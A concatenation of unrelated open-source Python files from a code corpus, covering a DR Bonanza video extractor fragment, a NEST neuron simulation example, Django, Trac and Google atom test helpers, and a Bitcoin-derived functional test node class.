_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/(?:[^/]+/)+(?:[^/])+?(?:assetId=(?P<id>\d+))?(?:[#&]|$)'
_TESTS = [{
'url': 'http://www.dr.dk/bonanza/serie/portraetter/Talkshowet.htm?assetId=65517',
'info_dict': {
'id': '65517',
'ext': 'mp4',
'title': 'Talkshowet - Leonard Cohen',
'description': 'md5:8f34194fb30cd8c8a30ad8b27b70c0ca',
'thumbnail': 're:^https?://.*\.(?:gif|jpg)$',
'timestamp': 1295537932,
'upload_date': '20110120',
'duration': 3664,
},
'params': {
'skip_download': True, # requires rtmp
},
}, {
'url': 'http://www.dr.dk/bonanza/radio/serie/sport/fodbold.htm?assetId=59410',
'md5': '6dfe039417e76795fb783c52da3de11d',
'info_dict': {
'id': '59410',
'ext': 'mp3',
'title': 'EM fodbold 1992 Danmark - Tyskland finale Transmission',
'description': 'md5:501e5a195749480552e214fbbed16c4e',
'thumbnail': 're:^https?://.*\.(?:gif|jpg)$',
'timestamp': 1223274900,
'upload_date': '20081006',
'duration': 7369,
},
}]
def _real_extract(self, url):
url_id = self._match_id(url)
webpage = self._download_webpage(url, url_id)
if url_id:
info = json.loads(self._html_search_regex(r'({.*?%s.*})' % url_id, webpage, 'json'))
else:
# Just fetch the first video on that page
info = json.loads(self._html_search_regex(r'bonanzaFunctions.newPlaylist\(({.*})\)', webpage, 'json'))
asset_id = str(info['AssetId'])
title = info['Title'].rstrip(' \'\"-,.:;!?')
duration = int_or_none(info.get('Duration'), scale=1000)
# First published online. "FirstPublished" contains the date for original airing.
timestamp = parse_iso8601(
re.sub(r'\.\d+$', '', info['Created']))
def parse_filename_info(url):
match = re.search(r'/\d+_(?P<width>\d+)x(?P<height>\d+)x(?P<bitrate>\d+)K\.(?P<ext>\w+)$', url)
if match:
return {
'width': int(match.group('width')),
'height': int(match.group('height')),
'vbr': int(match.group('bitrate')),
'ext': match.group('ext')
}
match = re.search(r'/\d+_(?P<bitrate>\d+)K\.(?P<ext>\w+)$', url)
if match:
return {
'vbr': int(match.group('bitrate')),
'ext': match.group(2)
}
return {}
video_types = ['VideoHigh', 'VideoMid', 'VideoLow']
preferencemap = {
'VideoHigh': -1,
'VideoMid': -2,
'VideoLow': -3,
'Audio': -4,
}
formats = []
for file in info['Files']:
if info['Type'] == "Video":
if file['Type'] in video_types:
format = parse_filename_info(file['Location'])
format.update({
'url': file['Location'],
'format_id': file['Type'].replace('Video', ''),
'preference': preferencemap.get(file['Type'], -10),
})
if format['url'].startswith('rtmp'):
rtmp_url = format['url']
format['rtmp_live'] = True # --resume does not work
if '/bonanza/' in rtmp_url:
format['play_path'] = rtmp_url.split('/bonanza/')[1]
formats.append(format)
elif file['Type'] == "Thumb":
thumbnail = file['Location']
elif info['Type'] == "Audio":
if file['Type'] == "Audio":
format = parse_filename_info(file['Location'])
format.update({
'url': file['Location'],
'format_id': file['Type'],
'vcodec': 'none',
})
formats.append(format)
elif file['Type'] == "Thumb":
thumbnail = file['Location']
description = '%s\n%s\n%s\n' % (
info['Description'], info['Actors'], info['Colophon'])
self._sort_formats(formats)
display_id = re.sub(r'[^\w\d-]', '', re.sub(r' ', '-', title.lower())) + '-' + asset_id
display_id = re.sub(r'-+', '-', display_id)
return {
'id': asset_id,
'display_id': display_id,
'title': title,
'formats': formats,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'duration': duration,
}
|
mogeiwang/nest
|
refs/heads/master
|
pynest/examples/HillTononi/ht_poisson.py
|
4
|
# -*- coding: utf-8 -*-
#
# ht_poisson.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
#
"""
A small example using the ht_neuron.
The neuron is bombarded with spike trains from four
Poisson generators, which are connected to the AMPA,
NMDA, GABA_A, and GABA_B synapses, respectively.
Once simulation is completed, membrane potential and
threshold, as well as synaptic conductances and intrinsic currents
are shown.
"""
import nest
import numpy as np
import matplotlib.pyplot as pl
nest.ResetKernel()
# create neuron
nrn = nest.Create('ht_neuron')
# get receptor ID information, so we can connect to the
# different synapses
receptors = nest.GetDefaults('ht_neuron')['receptor_types']
# create multimeter and configure it to record all information
# we want at 0.1ms resolution
mm = nest.Create('multimeter')
nest.SetStatus(mm, {'interval': 0.1,
'record_from': ['V_m', 'Theta', # membrane potential, threshold
# synaptic conductances
'g_AMPA', 'g_NMDA', 'g_GABAA', 'g_GABAB',
# intrinsic currents
'I_NaP', 'I_KNa', 'I_T', 'I_h']})
# create four Poisson generators
g = nest.Create('poisson_generator', 4, params={'rate': 100.})
# we cannot connect Poisson generators to neurons via dynamic synapses directly,
# so we put parrot neurons in between
p = nest.Create('parrot_neuron', 4)
# connect each generator to synapse with given weight
# using the adapting ht_synapse; connections pass through parrot neuron
for s in zip(g, p, [('AMPA', 500.0), ('NMDA', 50.), ('GABA_A', 250.), ('GABA_B', 100.0)]):
nest.Connect([s[0]], [s[1]])
nest.Connect([s[1]], nrn, syn_spec={'weight': s[2][1], 'receptor_type': receptors[s[2][0]],
'model': 'ht_synapse'})
# connect multimeter
nest.Connect(mm, nrn)
# simulate
for n in range(10):
nest.Simulate(100)
# extract data from multimeter
events = nest.GetStatus(mm)[0]['events']
t = events['times']; # time axis
pl.clf()
pl.subplot(311)
pl.plot(t, events['V_m'], 'b', t, events['Theta'], 'g')
pl.legend(['V_m', 'Theta'])
pl.ylabel('Membrane potential [mV]')
pl.title('ht_neuron driven by Poisson procs through AMPA, NMDA, GABA_A, GABA_B')
pl.subplot(312)
pl.plot(t, events['g_AMPA'], 'b', t, events['g_NMDA'], 'g',
t, events['g_GABAA'], 'r', t, events['g_GABAB'], 'm')
pl.legend(['AMPA', 'NMDA', 'GABA_A', 'GABA_B'])
pl.ylabel('Synaptic conductance [nS]')
pl.subplot(313)
pl.plot(t, events['I_h'], 'maroon', t, events['I_T'], 'orange',
t, events['I_NaP'], 'crimson', t, events['I_KNa'], 'aqua')
pl.legend(['I_h', 'I_T', 'I_NaP', 'I_KNa'])
pl.ylabel('Intrinsic current [pA]')
pl.xlabel('Time [ms]')
pl.plot()
|
simion/django-trampoline
|
refs/heads/develop
|
tests/test_paginator.py
|
2
|
"""
Test paginator for trampoline.
"""
from elasticsearch_dsl import Index
from elasticsearch_dsl import Search
from trampoline.paginator import ESSearchPaginator
from tests.base import BaseTestCase
from tests.models import Token
from tests.views import PaginatedContentView
class TestPaginator(BaseTestCase):
def setUp(self):
super(TestPaginator, self).setUp()
self.doc_type = Token.get_es_doc_type()
self.index = Index(self.doc_type._doc_type.index)
self.index.doc_type(self.doc_type)
self.index.create()
self.refresh()
for i in range(3):
Token.objects.create(name='token {0}'.format(i))
self.refresh()
def tearDown(self):
super(TestPaginator, self).tearDown()
self.index.delete()
def test_paginator(self):
search = Search(
index=Token.es_doc_type._doc_type.index,
doc_type=Token.es_doc_type._doc_type.name
)
search = search.sort('name')
page_size = 2
paginator = ESSearchPaginator(search, page_size)
page = paginator.page(1)
self.assertTrue(page.has_other_pages)
self.assertEqual(len(page.hits), page_size)
self.assertEqual(page.total_count, 3)
self.assertEqual(page.hits[0]['name'], 'token 0')
self.assertEqual(page.hits[1]['name'], 'token 1')
self.assertEqual(page.paginator, paginator)
self.assertEqual(page.number, 1)
self.assertIsNotNone(page.response)
page = paginator.page(2)
self.assertFalse(page.has_other_pages)
self.assertEqual(len(page.hits), 1)
self.assertEqual(page.hits[0]['name'], 'token 2')
def test_pagination_mixin(self):
class Request(object):
GET = {}
view = PaginatedContentView()
view.request = Request()
self.assertEqual(view.page_size, 2)
view.request.GET = {}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': -2}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': 'foobar'}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': 5}
self.assertEqual(view.get_page_number(), 5)
page = view.paginate_search()
self.assertIsNotNone(page)
self.assertIsNotNone(view.page)
self.assertEqual(view.get_context_data()['page'], view.page)
|
rbaumg/trac
|
refs/heads/trunk
|
trac/admin/test.py
|
1
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import difflib
import inspect
import io
import os
import re
import sys
import unittest
from trac.admin.console import AdminCommandManager, TracAdmin, _run
STRIP_TRAILING_SPACE = re.compile(r'( +)$', re.MULTILINE)
def load_expected_results(file, pattern):
"""Reads the file, named file, which contains test results separated
by the regular expression pattern.
The test results are returned as a dictionary.
"""
expected = {}
compiled_pattern = re.compile(pattern)
with open(file) as f:
test = None
for line in f:
line = line.rstrip().decode('utf-8')
match = compiled_pattern.search(line)
if match:
test = match.groups()[0]
expected[test] = ''
else:
expected[test] += line + '\n'
return expected
def _execute(func, strip_trailing_space=True, input=None):
_in = sys.stdin
_err = sys.stderr
_out = sys.stdout
try:
if input:
sys.stdin = io.BytesIO(input.encode('utf-8'))
sys.stdin.encoding = 'utf-8' # fake input encoding
sys.stderr = sys.stdout = out = io.BytesIO()
out.encoding = 'utf-8' # fake output encoding
return_val = func()
value = out.getvalue()
if isinstance(value, str): # reverse what print_listing did
value = value.decode('utf-8')
if strip_trailing_space:
return return_val, STRIP_TRAILING_SPACE.sub('', value)
else:
return return_val, value
finally:
sys.stdin = _in
sys.stderr = _err
sys.stdout = _out
def execute_cmd(tracadmin, cmd, strip_trailing_space=True, input=None):
def func():
try:
return tracadmin.onecmd(cmd)
except SystemExit:
return None
return _execute(func, strip_trailing_space, input)
class TracAdminTestCaseBase(unittest.TestCase):
expected_results_filename = 'console-tests.txt'
@classmethod
def setUpClass(cls):
cls.environ = os.environ.copy()
@classmethod
def tearDownClass(cls):
for name in set(os.environ) - set(cls.environ):
del os.environ[name]
os.environ.update(cls.environ)
@property
def expected_results_file(self):
results_file = sys.modules[self.__class__.__module__].__file__
return os.path.join(os.path.dirname(results_file),
self.expected_results_filename)
@property
def expected_results(self):
return load_expected_results(self.expected_results_file,
'===== (test_[^ ]+) =====')
def execute(self, cmd, strip_trailing_space=True, input=None):
if hasattr(self, 'admin'):
admin = self.admin
else:
admin = TracAdmin()
return execute_cmd(admin, cmd,
strip_trailing_space=strip_trailing_space,
input=input)
def assertExpectedResult(self, output, args=None):
test_name = inspect.stack()[1][3]
expected_result = self.expected_results[test_name]
if args is not None:
expected_result %= args
def diff():
# Create a useful delta between the output and the expected output
output_lines = ['%s\n' % x for x in output.split('\n')]
expected_lines = ['%s\n' % x for x in expected_result.split('\n')]
return ''.join(difflib.unified_diff(expected_lines, output_lines,
'expected', 'actual'))
msg = "%r != %r\n%s" % (expected_result, output, diff())
if '[...]' in expected_result:
m = re.match('.*'.join(map(re.escape,
expected_result.split('[...]'))) +
'\Z',
output, re.DOTALL)
self.assertTrue(m, msg)
else:
self.assertEqual(expected_result, output, msg)
@classmethod
def execute_run(cls, args):
def func():
try:
return _run(args)
except SystemExit:
return None
return _execute(func)
def get_command_help(self, *args):
docs = AdminCommandManager(self.env).get_command_help(list(args))
self.assertEqual(1, len(docs))
return docs[0][2]
def complete_command(self, *args):
return AdminCommandManager(self.env).complete_command(list(args))
|
simbha/GAE-appswell
|
refs/heads/master
|
appspot/framework/vendor/google_api/atom/mock_service.py
|
277
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MockService provides CRUD ops. for mocking calls to AtomPub services.
MockService: Exposes the publicly used methods of AtomService to provide
a mock interface which can be used in unit tests.
"""
import atom.service
import pickle
__author__ = 'api.jscudder (Jeffrey Scudder)'
# Recordings contains pairings of HTTP MockRequest objects with MockHttpResponse objects.
recordings = []
# If set, the mock service HttpRequest are actually made through this object.
real_request_handler = None
def ConcealValueWithSha(source):
import sha
return sha.new(source[:-5]).hexdigest()
def DumpRecordings(conceal_func=ConcealValueWithSha):
if conceal_func:
for recording_pair in recordings:
recording_pair[0].ConcealSecrets(conceal_func)
return pickle.dumps(recordings)
def LoadRecordings(recordings_file_or_string):
if isinstance(recordings_file_or_string, str):
atom.mock_service.recordings = pickle.loads(recordings_file_or_string)
elif hasattr(recordings_file_or_string, 'read'):
atom.mock_service.recordings = pickle.loads(
recordings_file_or_string.read())
def HttpRequest(service, operation, data, uri, extra_headers=None,
url_params=None, escape_params=True, content_type='application/atom+xml'):
"""Simulates an HTTP call to the server, makes an actual HTTP request if
real_request_handler is set.
This function operates in two different modes depending on if
real_request_handler is set or not. If real_request_handler is not set,
HttpRequest will look in this module's recordings list to find a response
which matches the parameters in the function call. If real_request_handler
is set, this function will call real_request_handler.HttpRequest, add the
response to the recordings list, and respond with the actual response.
Args:
service: atom.AtomService object which contains some of the parameters
needed to make the request. The following members are used to
construct the HTTP call: server (str), additional_headers (dict),
port (int), and ssl (bool).
operation: str The HTTP operation to be performed. This is usually one of
'GET', 'POST', 'PUT', or 'DELETE'
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string.
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, this method will read
a chunk of 100K bytes at a time and send them.
If the data is a list of parts to be sent, each part will be evaluated
and sent.
uri: The beginning of the URL to which the request should be sent.
Examples: '/', '/base/feeds/snippets',
'/m8/feeds/contacts/default/base'
extra_headers: dict of strings. HTTP headers which should be sent
in the request. These headers are in addition to those stored in
service.additional_headers.
url_params: dict of strings. Key value pairs to be added to the URL as
URL parameters. For example {'foo':'bar', 'test':'param'} will
become ?foo=bar&test=param.
escape_params: bool default True. If true, the keys and values in
url_params will be URL escaped when the form is constructed
(Special characters converted to %XX form.)
content_type: str The MIME type for the data being sent. Defaults to
'application/atom+xml', this is only used if data is set.
"""
full_uri = atom.service.BuildUri(uri, url_params, escape_params)
(server, port, ssl, uri) = atom.service.ProcessUrl(service, uri)
current_request = MockRequest(operation, full_uri, host=server, ssl=ssl,
data=data, extra_headers=extra_headers, url_params=url_params,
escape_params=escape_params, content_type=content_type)
# If the request handler is set, we should actually make the request using
# the request handler and record the response to replay later.
if real_request_handler:
response = real_request_handler.HttpRequest(service, operation, data, uri,
extra_headers=extra_headers, url_params=url_params,
escape_params=escape_params, content_type=content_type)
# TODO: need to copy the HTTP headers from the real response into the
# recorded_response.
recorded_response = MockHttpResponse(body=response.read(),
status=response.status, reason=response.reason)
# Insert a tuple which maps the request to the response object returned
# when making an HTTP call using the real_request_handler.
recordings.append((current_request, recorded_response))
return recorded_response
else:
# Look through available recordings to see if one matches the current
# request.
for request_response_pair in recordings:
if request_response_pair[0].IsMatch(current_request):
return request_response_pair[1]
return None
class MockRequest(object):
"""Represents a request made to an AtomPub server.
These objects are used to determine if a client request matches a recorded
HTTP request to determine what the mock server's response will be.
"""
def __init__(self, operation, uri, host=None, ssl=False, port=None,
data=None, extra_headers=None, url_params=None, escape_params=True,
content_type='application/atom+xml'):
"""Constructor for a MockRequest
Args:
operation: str One of 'GET', 'POST', 'PUT', or 'DELETE' this is the
HTTP operation requested on the resource.
uri: str The URL describing the resource to be modified or feed to be
retrieved. This should include the protocol (http/https) and the host
(aka domain). For example, these are some valud full_uris:
'http://example.com', 'https://www.google.com/accounts/ClientLogin'
host: str (optional) The server name which will be placed at the
beginning of the URL if the uri parameter does not begin with 'http'.
Examples include 'example.com', 'www.google.com', 'www.blogger.com'.
ssl: boolean (optional) If true, the request URL will begin with https
instead of http.
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string. (optional)
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, the constructor
will read the entire file into memory. If the data is a list of
parts to be sent, each part will be evaluated and stored.
extra_headers: dict (optional) HTTP headers included in the request.
url_params: dict (optional) Key value pairs which should be added to
the URL as URL parameters in the request. For example uri='/',
url_parameters={'foo':'1','bar':'2'} could become '/?foo=1&bar=2'.
escape_params: boolean (optional) Perform URL escaping on the keys and
values specified in url_params. Defaults to True.
content_type: str (optional) Provides the MIME type of the data being
sent.
"""
self.operation = operation
self.uri = _ConstructFullUrlBase(uri, host=host, ssl=ssl)
self.data = data
self.extra_headers = extra_headers
self.url_params = url_params or {}
self.escape_params = escape_params
self.content_type = content_type
def ConcealSecrets(self, conceal_func):
"""Conceal secret data in this request."""
if self.extra_headers.has_key('Authorization'):
self.extra_headers['Authorization'] = conceal_func(
self.extra_headers['Authorization'])
def IsMatch(self, other_request):
"""Check to see if the other_request is equivalent to this request.
Used to determine if a recording matches an incoming request so that a
recorded response should be sent to the client.
The matching is not exact, only the operation and URL are examined
currently.
Args:
other_request: MockRequest The request which we want to check this
(self) MockRequest against to see if they are equivalent.
"""
# More accurate matching logic will likely be required.
return (self.operation == other_request.operation and self.uri ==
other_request.uri)
def _ConstructFullUrlBase(uri, host=None, ssl=False):
"""Puts URL components into the form http(s)://full.host.strinf/uri/path
Used to construct a roughly canonical URL so that URLs which begin with
'http://example.com/' can be compared to a uri of '/' when the host is
set to 'example.com'
If the uri contains 'http://host' already, the host and ssl parameters
are ignored.
Args:
uri: str The path component of the URL, examples include '/'
host: str (optional) The host name which should prepend the URL. Example:
'example.com'
ssl: boolean (optional) If true, the returned URL will begin with https
instead of http.
Returns:
String which has the form http(s)://example.com/uri/string/contents
"""
if uri.startswith('http'):
return uri
if ssl:
return 'https://%s%s' % (host, uri)
else:
return 'http://%s%s' % (host, uri)
class MockHttpResponse(object):
"""Returned from MockService crud methods as the server's response."""
def __init__(self, body=None, status=None, reason=None, headers=None):
"""Construct a mock HTTPResponse and set members.
Args:
body: str (optional) The HTTP body of the server's response.
status: int (optional)
reason: str (optional)
headers: dict (optional)
"""
self.body = body
self.status = status
self.reason = reason
self.headers = headers or {}
def read(self):
return self.body
def getheader(self, header_name):
return self.headers[header_name]
|
guncoin/guncoin
|
refs/heads/master
|
test/functional/test_framework/test_node.py
|
3
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Class for bitcoind node under test"""
import contextlib
import decimal
import errno
from enum import Enum
import http.client
import json
import logging
import os
import re
import subprocess
import tempfile
import time
import urllib.parse
from .authproxy import JSONRPCException
from .util import (
append_config,
delete_cookie_file,
get_rpc_proxy,
rpc_url,
wait_until,
p2p_port,
)
# For Python 3.4 compatibility
JSONDecodeError = getattr(json, "JSONDecodeError", ValueError)
BITCOIND_PROC_WAIT_TIMEOUT = 60
class FailedToStartError(Exception):
"""Raised when a node fails to start correctly."""
class ErrorMatch(Enum):
FULL_TEXT = 1
FULL_REGEX = 2
PARTIAL_REGEX = 3
class TestNode():
"""A class for representing a bitcoind node under test.
This class contains:
- state about the node (whether it's running, etc)
- a Python subprocess.Popen object representing the running process
- an RPC connection to the node
- one or more P2P connections to the node
To make things easier for the test writer, any unrecognised messages will
be dispatched to the RPC connection."""
def __init__(self, i, datadir, *, rpchost, timewait, bitcoind, bitcoin_cli, mocktime, coverage_dir, extra_conf=None, extra_args=None, use_cli=False):
self.index = i
self.datadir = datadir
self.stdout_dir = os.path.join(self.datadir, "stdout")
self.stderr_dir = os.path.join(self.datadir, "stderr")
self.rpchost = rpchost
self.rpc_timeout = timewait
self.binary = bitcoind
self.coverage_dir = coverage_dir
if extra_conf != None:
append_config(datadir, extra_conf)
# Most callers will just need to add extra args to the standard list below.
# For those callers that need more flexibility, they can just set the args property directly.
# Note that common args are set in the config file (see initialize_datadir)
self.extra_args = extra_args
self.args = [
self.binary,
"-datadir=" + self.datadir,
"-logtimemicros",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-mocktime=" + str(mocktime),
"-uacomment=testnode%d" % i
]
self.cli = TestNodeCLI(bitcoin_cli, self.datadir)
self.use_cli = use_cli
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.url = None
self.log = logging.getLogger('TestFramework.node%d' % i)
self.cleanup_on_exit = True # Whether to kill the node when this object goes away
self.p2ps = []
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
PRIV_KEYS = [
# adress , privkey
('mjTkW3DjgyZck4KbiRusZsqTgaYTxdSz6z', 'cVpF924EspNh8KjYsfhgY96mmxvT6DgdWiTYMtMjuM74hJaU5psW'),
('msX6jQXvxiNhx3Q62PKeLPrhrqZQdSimTg', 'cUxsWyKyZ9MAQTaAhUQWJmBbSvHMwSmuv59KgxQV7oZQU3PXN3KE'),
('mnonCMyH9TmAsSj3M59DsbH8H63U3RKoFP', 'cTrh7dkEAeJd6b3MRX9bZK8eRmNqVCMH3LSUkE3dSFDyzjU38QxK'),
('mqJupas8Dt2uestQDvV2NH3RU8uZh2dqQR', 'cVuKKa7gbehEQvVq717hYcbE9Dqmq7KEBKqWgWrYBa2CKKrhtRim'),
('msYac7Rvd5ywm6pEmkjyxhbCDKqWsVeYws', 'cQDCBuKcjanpXDpCqacNSjYfxeQj8G6CAtH1Dsk3cXyqLNC4RPuh'),
('n2rnuUnwLgXqf9kk2kjvVm8R5BZK1yxQBi', 'cQakmfPSLSqKHyMFGwAqKHgWUiofJCagVGhiB4KCainaeCSxeyYq'),
('myzuPxRwsf3vvGzEuzPfK9Nf2RfwauwYe6', 'cQMpDLJwA8DBe9NcQbdoSb1BhmFxVjWD5gRyrLZCtpuF9Zi3a9RK'),
('mumwTaMtbxEPUswmLBBN3vM9oGRtGBrys8', 'cSXmRKXVcoouhNNVpcNKFfxsTsToY5pvB9DVsFksF1ENunTzRKsy'),
('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
]
return PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
def start(self, extra_args=None, *, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, **kwargs)
self.running = True
self.log.debug("bitcoind started, waiting for RPC to come up")
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the bitcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
raise FailedToStartError(self._node_msg(
'bitcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
self.rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.rpc_connected = True
self.url = self.rpc.url
self.log.debug("RPC successfully started")
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
if e.error['code'] != -28: # RPC in warmup?
raise # unknown JSON RPC exception
except ValueError as e: # cookie file not found and no rpcuser or rpcassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to bitcoind")
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr=''):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs):
debug_log = os.path.join(self.datadir, 'regtest', 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
try:
yield
finally:
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
self._raise_assertion_error('Expected message "{}" does not partially match log:\n\n{}\n\n'.format(expected_msg, print_log))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to bitcoind
expected_msg: regex that stderr should match when bitcoind fails
Will throw if bitcoind starts without an error.
Will throw if an expected_msg is provided and it does not match bitcoind's stdout."""
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('bitcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "bitcoind should have exited with an error"
else:
assert_msg = "bitcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def node_encrypt_wallet(self, passphrase):
""""Encrypts the wallet.
This causes bitcoind to shutdown, so this method takes
care of cleaning up resources."""
self.encryptwallet(passphrase)
self.wait_until_stopped()
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
p2p_conn.wait_for_verack()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
